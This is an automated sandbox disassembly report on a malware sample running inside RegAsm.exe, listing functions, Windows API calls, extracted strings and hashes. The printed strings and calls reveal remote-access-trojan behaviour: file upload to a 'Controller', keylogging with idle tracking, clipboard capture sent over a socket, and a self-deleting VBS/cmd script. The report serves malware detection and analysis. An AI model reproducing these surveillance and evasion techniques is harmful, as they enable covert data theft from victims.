                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                • API String ID: 3086580692-2582957567
                                                • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                • API String ID: 3795512280-1152054767
                                                • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                • _free.LIBCMT ref: 10007CFB
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 10007D1D
                                                • _free.LIBCMT ref: 10007D32
                                                • _free.LIBCMT ref: 10007D3D
                                                • _free.LIBCMT ref: 10007D5F
                                                • _free.LIBCMT ref: 10007D72
                                                • _free.LIBCMT ref: 10007D80
                                                • _free.LIBCMT ref: 10007D8B
                                                • _free.LIBCMT ref: 10007DC3
                                                • _free.LIBCMT ref: 10007DCA
                                                • _free.LIBCMT ref: 10007DE7
                                                • _free.LIBCMT ref: 10007DFF
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                • _free.LIBCMT ref: 0045137F
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 004513A1
                                                • _free.LIBCMT ref: 004513B6
                                                • _free.LIBCMT ref: 004513C1
                                                • _free.LIBCMT ref: 004513E3
                                                • _free.LIBCMT ref: 004513F6
                                                • _free.LIBCMT ref: 00451404
                                                • _free.LIBCMT ref: 0045140F
                                                • _free.LIBCMT ref: 00451447
                                                • _free.LIBCMT ref: 0045144E
                                                • _free.LIBCMT ref: 0045146B
                                                • _free.LIBCMT ref: 00451483
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                • API String ID: 489098229-1431523004
                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                • API String ID: 1913171305-3159800282
                                                • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                • String ID:
                                                • API String ID: 3658366068-0
                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                • GetFileType.KERNEL32 ref: 00455D82
                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                • GetLastError.KERNEL32 ref: 00455F31
                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: \&G$\&G$`&G
                                                • API String ID: 269201875-253610517
                                                • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 65535$udp
                                                • API String ID: 0-1267037602
                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                • String ID: [${ User has been idle for $ minutes }$]
                                                • API String ID: 911427763-3954389425
                                                • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                                                • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                                                • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                • _free.LIBCMT ref: 0043A9C3
                                                • _free.LIBCMT ref: 0043A9CA
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                • String ID:
                                                • API String ID: 2441525078-0
                                                • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                • GetMessageA.USER32 ref: 0040556F
                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                • API String ID: 2956720200-749203953
                                                • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                • String ID: 0VG$0VG$<$@$Temp
                                                • API String ID: 1704390241-2575729100
                                                • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32 ref: 0041697C
                                                • EmptyClipboard.USER32 ref: 0041698A
                                                • CloseClipboard.USER32 ref: 00416990
                                                • OpenClipboard.USER32 ref: 00416997
                                                • GetClipboardData.USER32 ref: 004169A7
                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                • CloseClipboard.USER32 ref: 004169BF
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
